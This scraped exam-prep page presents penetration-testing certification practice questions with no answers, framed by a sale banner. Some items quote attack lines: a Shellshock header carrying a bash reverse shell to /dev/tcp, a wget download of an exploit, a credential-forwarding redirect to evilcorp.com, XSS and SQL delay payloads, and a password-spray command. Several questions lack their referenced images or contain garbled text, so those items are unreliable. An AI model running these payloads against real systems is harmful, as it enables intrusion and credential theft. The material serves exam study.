Summer Sale Special 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: ex2p65

Exact2Pass Menu

Question # 4

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A.

NDA

B.

MSA

C.

SOW

D.

MOU

Full Access
Question # 5

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.

Which of the following tools can help the tester achieve this goal?

A.

Metasploit

B.

Hydra

C.

SET

D.

WPScan

Full Access
Question # 6

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Full Access
Question # 7

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 8

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

A.

Buffer overflows

B.

Cross-site scripting

C.

Race-condition attacks

D.

Zero-day attacks

E.

Injection flaws

F.

Ransomware attacks

Full Access
Question # 9

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A.

Edit the discovered file with one line of code for remote callback

B.

Download .pl files and look for usernames and passwords

C.

Edit the smb.conf file and upload it to the server

D.

Download the smb.conf file and look at configurations

Full Access
Question # 10

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

B.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

C.

exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

D.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Full Access
Question # 11

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

A.

Nessus

B.

ProxyChains

C.

OWASPZAP

D.

Empire

Full Access
Question # 12

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

A.

Clarify the statement of work.

B.

Obtain an asset inventory from the client.

C.

Interview all stakeholders.

D.

Identify all third parties involved.

Full Access
Question # 13

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?

A.

nmap גsn 192.168.0.1/16

B.

nmap גsn 192.168.0.1-254

C.

nmap גsn 192.168.0.1 192.168.0.1.254

D.

nmap גsN 192.168.0.0/24

Full Access
Question # 14

A compliance-based penetration test is primarily concerned with:

A.

obtaining Pll from the protected network.

B.

bypassing protection on edge devices.

C.

determining the efficacy of a specific set of security standards.

D.

obtaining specific information from the protected network.

Full Access
Question # 15

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

A.

Aircrack-ng

B.

Wireshark

C.

Wifite

D.

Kismet

Full Access
Question # 16

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

A.

S/MIME

B.

FTPS

C.

DNSSEC

D.

AS2

Full Access
Question # 17

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company’s request?

A.

The reverse-engineering team may have a history of selling exploits to third parties.

B.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

C.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

D.

The reverse-engineering team will be given access to source code for analysis.

Full Access
Question # 18

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

A.

RFID cloning

B.

RFID tagging

C.

Meta tagging

D.

Tag nesting

Full Access
Question # 19

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

A.

Badge cloning

B.

Dumpster diving

C.

Tailgating

D.

Shoulder surfing

Full Access
Question # 20

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

A.

nmap192.168.1.1-5–PU22-25,80

B.

nmap192.168.1.1-5–PA22-25,80

C.

nmap192.168.1.1-5–PS22-25,80

D.

nmap192.168.1.1-5–Ss22-25,80

Full Access
Question # 21

A penetration tester ran the following command on a staging server:

python –m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

A.

nc 10.10.51.50 9891 < exploit

B.

powershell –exec bypass –f \\10.10.51.50\9891

C.

bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

D.

wget 10.10.51.50:9891/exploit

Full Access
Question # 22

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

  • Pre-engagement interaction (scoping and ROE)
  • Intelligence gathering (reconnaissance)
  • Threat modeling
  • Vulnerability analysis
  • Exploitation and post exploitation
  • Reporting

Which of the following methodologies does the client use?

A.

OWASP Web Security Testing Guide

B.

PTES technical guidelines

C.

NIST SP 800-115

D.

OSSTMM

Full Access
Question # 23

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

A.

Send deauthentication frames to the stations.

B.

Perform jamming on all 2.4GHz and 5GHz channels.

C.

Set the malicious AP to broadcast within dynamic frequency selection channels.

D.

Modify the malicious AP configuration to not use a pre-shared key.

Full Access
Question # 24

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.

Which of the following should the tester verify FIRST to assess this risk?

A.

Whether sensitive client data is publicly accessible

B.

Whether the connection between the cloud and the client is secure

C.

Whether the client's employees are trained properly to use the platform

D.

Whether the cloud applications were developed using a secure SDLC

Full Access
Question # 25

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following BEST describes what happened?

A.

The penetration tester was testing the wrong assets

B.

The planning process failed to ensure all teams were notified

C.

The client was not ready for the assessment to start

D.

The penetration tester had incorrect contact information

Full Access
Question # 26

PCI DSS requires which of the following as part of the penetration-testing process?

A.

The penetration tester must have cybersecurity certifications.

B.

The network must be segmented.

C.

Only externally facing systems should be tested.

D.

The assessment must be performed during non-working hours.

Full Access
Question # 27

A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?

A.

DNS cache poisoning

B.

MAC spoofing

C.

ARP poisoning

D.

Double-tagging attack

Full Access
Question # 28

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

A.

Implement a recurring cybersecurity awareness education program for all users.

B.

Implement multifactor authentication on all corporate applications.

C.

Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

D.

Implement an email security gateway to block spam and malware from email communications.

Full Access
Question # 29

A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

A.

Redirecting output from a file to a remote system

B.

Building a scheduled task for execution

C.

Mapping a share to a remote system

D.

Executing a file on the remote system

E.

Creating a new process on all domain systems

F.

Setting up a reverse shell from a remote system

G.

Adding an additional IP address on the compromised system

Full Access
Question # 30

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

A.

Prohibiting exploitation in the production environment

B.

Requiring all testers to review the scoping document carefully

C.

Never assessing the production networks

D.

Prohibiting testers from joining the team during the assessment

Full Access
Question # 31

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A.

Executive summary

B.

Remediation

C.

Methodology

D.

Metrics and measures

Full Access
Question # 32

The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A.

A birthday attack on 64-bit ciphers (Sweet32)

B.

An attack that breaks RC4 encryption

C.

An attack on a session ticket extension (Ticketbleed)

D.

A Heartbleed attack

Full Access
Question # 33

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

A.

sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.

B.

*range(1, 1025) on line 1 populated the portList list in numerical order.

C.

Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM

D.

The remoteSvr variable has neither been type-hinted nor initialized.

Full Access
Question # 34

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

A.

To provide protection against host OS vulnerabilities

B.

To reduce the probability of a VM escape attack

C.

To fix any misconfigurations of the hypervisor

D.

To enable all features of the hypervisor

Full Access
Question # 35

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

A.

Gain access to the target host and implant malware specially crafted for this purpose.

B.

Exploit the local DNS server and add/update the zone records with a spoofed A record.

C.

Use the Scapy utility to overwrite name resolution fields in the DNS query response.

D.

Proxy HTTP connections from the target host to that of the spoofed host.

Full Access
Question # 36

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

A.

An unknown-environment assessment

B.

A known-environment assessment

C.

A red-team assessment

D.

A compliance-based assessment

Full Access
Question # 37

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

A.

Shoulder surfing

B.

Call spoofing

C.

Badge stealing

D.

Tailgating

E.

Dumpster diving

F.

Email phishing

Full Access
Question # 38

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 39

A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

A.

CentOS

B.

Arch Linux

C.

Windows Server

D.

Ubuntu

Full Access
Question # 40

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

A.

Vulnerability scanning

B.

Network segmentation

C.

System hardening

D.

Intrusion detection

Full Access
Question # 41

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A.

The SSL certificates were invalid.

B.

The tester IP was blocked.

C.

The scanner crashed the system.

D.

The web page was not found.

Full Access
Question # 42

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

A.

Metadata service attack

B.

Container escape techniques

C.

Credential harvesting

D.

Resource exhaustion

Full Access
Question # 43

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

A.

OWASP ZAP

B.

Nmap

C.

Nessus

D.

BeEF

E.

Hydra

F.

Burp Suite

Full Access
Question # 44

A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

A.

Decode the authorization header using UTF-8.

B.

Decrypt the authorization header using bcrypt.

C.

Decode the authorization header using Base64.

D.

Decrypt the authorization header using AES.

Full Access
Question # 45

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A.

Use Patator to pass the hash and Responder for persistence.

B.

Use Hashcat to pass the hash and Empire for persistence.

C.

Use a bind shell to pass the hash and WMI for persistence.

D.

Use Mimikatz to pass the hash and PsExec for persistence.

Full Access
Question # 46

A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.

Which of the following methods will MOST likely work?

A.

Try to obtain the private key used for S/MIME from the CEO's account.

B.

Send an email from the CEO's account, requesting a new account.

C.

Move laterally from the mail server to the domain controller.

D.

Attempt to escalate privileges on the mail server to gain root access.

Full Access
Question # 47

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

A.

A handheld RF spectrum analyzer

B.

A mask and personal protective equipment

C.

Caution tape for marking off insecure areas

D.

A dedicated point of contact at the client

E.

The paperwork documenting the engagement

F.

Knowledge of the building's normal business hours

Full Access
Question # 48

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

A.

Spawned shells

B.

Created user accounts

C.

Server logs

D.

Administrator accounts

E.

Reboot system

F.

ARP cache

Full Access
Question # 49

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

A.

Spawn a local shell.

B.

Disable NIC.

C.

List processes.

D.

Change the MAC address

Full Access
Question # 50

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

A.

Check the scoping document to determine if exfiltration is within scope.

B.

Stop the penetration test.

C.

Escalate the issue.

D.

Include the discovery and interaction in the daily report.

Full Access
Question # 51

A penetration tester wrote the following Bash script to brute force a local service password:

..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

A.

..e

cho "The correct password is $p" && break)

ho "The correct password is $p" I| break

B.

.e

cho "The correct password is $p" && break)

o "The correct password is $p" I break

C.

e

cho "The correct password is Sp" && break)

echo "The correct password is $p" && break)

D.

.

{ echo "The correct password is $p" && break )

With

E.

( echo "The correct password is $p" && break )

Full Access
Question # 52

A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?

A.

Searching for code repositories associated with a developer who previously worked for the target company code repositories associated with the

B.

Searching for code repositories target company's organization

C.

Searching for code repositories associated with the target company's organization

D.

Searching for code repositories associated with a developer who previously worked for the target company

Full Access
Question # 53

A penetration tester writes the following script:

Which of the following is the tester performing?

A.

Searching for service vulnerabilities

B.

Trying to recover a lost bind shell

C.

Building a reverse shell listening on specified ports

D.

Scanning a network for specific open ports

Full Access
Question # 54

A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?

A.

Netcraft

B.

CentralOps

C.

Responder

D.

FOCA

Full Access
Question # 55

A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

A.

Specially craft and deploy phishing emails to key company leaders.

B.

Run a vulnerability scan against the company's external website.

C.

Runtime the company's vendor/supply chain.

D.

Scrape web presences and social-networking sites.

Full Access
Question # 56

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

A.

Set up a captive portal with embedded malicious code.

B.

Capture handshakes from wireless clients to crack.

C.

Span deauthentication packets to the wireless clients.

D.

Set up another access point and perform an evil twin attack.

Full Access
Question # 57

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

A.

window.location.= 'https://evilcorp.com '

B.

crossDomain: true

C.

geturlparameter ('username')

D.

redirectUrl = 'https://example.com '

Full Access
Question # 58

During the assessment of a client's cloud and on-premises environments, a penetration tester was able to gain ownership of a storage object within the cloud environment using the provided on-premises credentials. Which of the following best describes why the tester was able to gain access?

A.

Federation misconfiguration of the container

B.

Key mismanagement between the environments

C.

laaS failure at the provider

D.

Container listed in the public domain

Full Access
Question # 59

While performing the scanning phase of a penetration test, the penetration tester runs the following command:

........v -sV -p- 10.10.10.23-28

....ip scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try next?

A.

-su

B.

-pn

C.

-sn

D.

-ss

Full Access
Question # 60

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A.

A vulnerability scan

B.

A WHOIS lookup

C.

A packet capture

D.

An Nmap scan

Full Access
Question # 61

Penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus and )ut.. they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?

A.

Conditional

B.

Library

C.

Dictionary

D.

Sub application

Full Access
Question # 62

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

A.

nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan

B.

nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan

C.

nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan

D.

nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan

Full Access
Question # 63

The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

A.

Line 8

B.

Line 13

C.

Line 19

D.

Line 20

Full Access
Question # 64

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:

U3VQZXIkM2NyZXQhCg==

Which of the following commands should the tester use NEXT to decode the contents of the file?

A.

echo U3VQZXIkM2NyZXQhCg== | base64 ג€"d

B.

tar zxvf password.txt

C.

hydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24

D.

john --wordlist /usr/share/seclists/rockyou.txt password.txt

Full Access
Question # 65

The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

A.

NDA

B.

SLA

C.

MSA

D.

SOW

Full Access
Question # 66

A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet." Which of the following audiences was this message intended?

A.

Systems administrators

B.

C-suite executives

C.

Data privacy ombudsman

D.

Regulatory officials

Full Access
Question # 67

Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A.

Exploit-DB

B.

Metasploit

C.

Shodan

D.

Retina

Full Access
Question # 68

Given the following script:

while True:

print ("Hello World")

Which of the following describes True?

A.

A while loop

B.

A conditional

C.

A Boolean operator

D.

An arithmetic operator

Full Access
Question # 69

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

A.

tcpdump -i eth01 arp and arp[6:2] == 2

B.

arp -s 192.168.1.63 60-36-DD-A6-C5-33

C.

ipconfig /all findstr /v 00-00-00 | findstr Physical

D.

route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

Full Access
Question # 70

During a test of a custom-built web application, a penetration tester identifies several vulnerabilities. Which of the following would be the most interested in the steps to reproduce these vulnerabilities?

A.

Operations staff

B.

Developers

C.

Third-party stakeholders

D.

C-suite executives

Full Access
Question # 71

A penetration tester wrote the following script on a compromised system:

#!/bin/bash

network='10.100.100'

ports='22 23 80 443'

for x in {1 .. 254};

do (nc -zv $network.$x $ports );

done

Which of the following would explain using this script instead of another tool?

A.

The typical tools could not be used against Windows systems.

B.

The configuration required the penetration tester to not utilize additional files.

C.

The Bash script will provide more thorough output.

D.

The penetration tester wanted to persist this script to run on reboot.

Full Access
Question # 72

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Full Access
Question # 73

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

A.

ROE

B.

SLA

C.

NDA

D.

SOW

Full Access
Question # 74

A penetration tester is conducting an assessment of an organization that has both a web and mobile application. While testing the user profile page, the penetration tester notices that additional data is returned in the API response, which is not displayed in the web user interface. Which of the following is the most effective technique to extract sensitive user data?

A.

Compare PI I from data leaks to publicly exposed user profiles.

B.

Target the user profile page with a denial-of-service attack.

C.

Target the user profile page with a reflected XSS attack.

D.

Compare the API response fields to GUI fields looking for PH.

Full Access
Question # 75

A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network. Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?

A.

nmap —script=s7-info -p 102 10.88.88.76/24 -T3

B.

nmap —script=wsdd-discover -p 3702 -sUlO.88.88.76/24

C.

nmap --script=iax2-version -p 4569 -sU -V 10.88.88.76/24 -T2

D.

nmap --script=xll-access -p 6000-6009 10.88.88.76/24

Full Access
Question # 76

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?

A.

Use Nmap's -T2 switch to run a slower scan and with less resources.

B.

Run the scans using multiple machines.

C.

Run the scans only during lunch hours.

D.

Use Nmap's -host-timeout switch to skip unresponsive targets.

Full Access
Question # 77

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Full Access
Question # 78

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester most likely utilize?

A.

Wireshark

B.

Netcat

C.

Nmap

D.

Ettercap

Full Access
Question # 79

Which of the following best explains why communication is a vital phase of a penetration test?

A.

To discuss situational awareness

B.

To build rapport with the emergency contact

C.

To explain the data destruction process

D.

To ensure the likelihood of future assessments

Full Access
Question # 80

Which of the following describes how a penetration tester could prioritize findings in a report?

A.

Business mission and goals

B.

Cyberassets

C.

Network infrastructure

D.

Cyberthreats

Full Access
Question # 81

Given the following Nmap scan command:

[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

A.

1

B.

101

C.

255

D.

256

Full Access
Question # 82

During a security assessment, a penetration tester decides to write the following Python script: import requests

x= ['OPTIONS', 'TRACE', 'TEST'l

for y in x;

z - requests.request(y, 'http://server.net ')

print(y, z.status_code, z.reason)

Which of the following is the penetration tester trying to accomplish? (Select two).

A.

Web server denial of service

B.

HTTP methods availability

C.

'Web application firewall detection

D.

'Web server fingerprinting

E.

Web server error handling

F.

Web server banner grabbing

Full Access
Question # 83

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:

/home/user/scripts

Which of the following commands should the penetration tester use to perform this scan?

A.

nmap resume "not intrusive"

B.

nmap script default safe

C.

nmap script /home/user/scripts

D.

nmap -load /home/user/scripts

Full Access
Question # 84

Which of the following would be the most efficient way to write a Python script that interacts with a web application?

A.

Create a class for requests.

B.

Write a function for requests.

C.

Import the requests library.

D.

Use the cURL OS command.

Full Access
Question # 85

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:

IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>"

When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

A.

SQL injection

B.

Command injection

C.

Cross-site request forgery

D.

Cross-site scripting

Full Access
Question # 86

In Java and C/C++, variable initialization is critical because:

A.

the unknown value, when used later, will cause unexpected behavior.

B.

the compiler will assign null to the variable, which will cause warnings and errors.

C.

the initial state of the variable creates a race condition.

D.

the variable will not have an object type assigned to it.

Full Access
Question # 87

Which of the following tools would be best to use to conceal data in various kinds of image files?

A.

Kismet

B.

Snow

C.

Responder

D.

Metasploit

Full Access
Question # 88

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

A.

All of the ports in the target range are closed.

B.

Nmap needs more time to scan the ports in the target range.

C.

The ports in the target range cannot be scanned because they are common UDP ports.

D.

All of the ports in the target range are open

Full Access
Question # 89

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

A.

Implementation of patching and change control programs

B.

Revision of client scripts used to perform system updates

C.

Remedial training for the client's systems administrators

D.

Refrainment from patching systems until quality assurance approves

Full Access
Question # 90

An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems. Which of the following documents addresses this requirement?

A.

ROE

B.

NDA

C.

MOU

D.

SLA

Full Access
Question # 91

A client asks a penetration tester to retest its network a week after the scheduled maintenance window. Which of the following is the client attempting to do?

A.

Determine if the tester was proficient.

B.

Test a new non-public-facing server for vulnerabilities.

C.

Determine if the initial report is complete.

D.

Test the efficacy of the remediation effort.

Full Access
Question # 92

An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?

A.

Client acceptance

B.

Data destruction process

C.

Attestation of findings

D.

Lessons learned

Full Access
Question # 93

A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

A.

enum4linux -u userl -p /passwordList.txt 192.168.0.1

B.

enum4linux -u userl -p Passwordl 192.168.0.1

C.

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

D.

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

Full Access
Question # 94

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

A.

Increase password complexity.

B.

Implement system hardening.

C.

Restrict simultaneous user log-ins.

D.

Require local network access.

Full Access
Question # 95

A penetration tester managed to exploit a vulnerability using the following payload:

IF (1=1) WAIT FOR DELAY '0:0:15'

Which of the following actions would best mitigate this type ol attack?

A.

Encrypting passwords

B.

Parameterizing queries

C.

Encoding output

D.

Sanitizing HTML

Full Access
Question # 96

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Full Access
Question # 97

A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building. Which of the following attacks did the penetration tester perform?

A.

Dumpster diving

B.

Phishing

C.

Badge cloning

D.

Tailgating

Full Access
Question # 98

A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable service?

A)

B)

C)

D)

A.

nmap -v -p 25 -- soript smtp-enum-users remotehost

B.

nmap -v -- script=mysql-info.nse remotehost

C.

nmap --ocript=omb-brute.noe remotehoat

D.

nmap -p 3306 -- script "http*vuln*" remotehost

Full Access
Question # 99

A penetration tester developed the following script to be used during an engagement:

#!/usr/bin/python

import socket, sys

ports = [21, 22, 23, 25, 80, 139, 443, 445, 3306, 3389]

if len(sys.argv) > 1:

target = socket.gethostbyname (sys. argv [0])

else:

print ("Few arguments.")

print ("Syntax: python {} ". format (sys. argv [0]))

sys.exit ()

try:

for port in ports:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

s.settimeout (2)

result = s.connect_ex ((target, port) )

if result == 0:

print ("Port {} is opened". format (port) )

except KeyboardInterrupt:

print ("\nExiting ... ")

sys.exit ()

However, when the penetration tester ran the script, the tester received the following message:

socket.gaierror: [Errno -2] Name or service not known

Which of the following changes should the penetration tester implement to fix the script?

A.

From:

target = socket.gethostbyname (sys. argv [0])

To:

target = socket.gethostbyname (sys.argv[1])

B.

From:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

To:

s = socket.socket (socket.AF_INET, socket. SOCK_DGRAM)

C.

From:

import socket, sys

To:

import socket

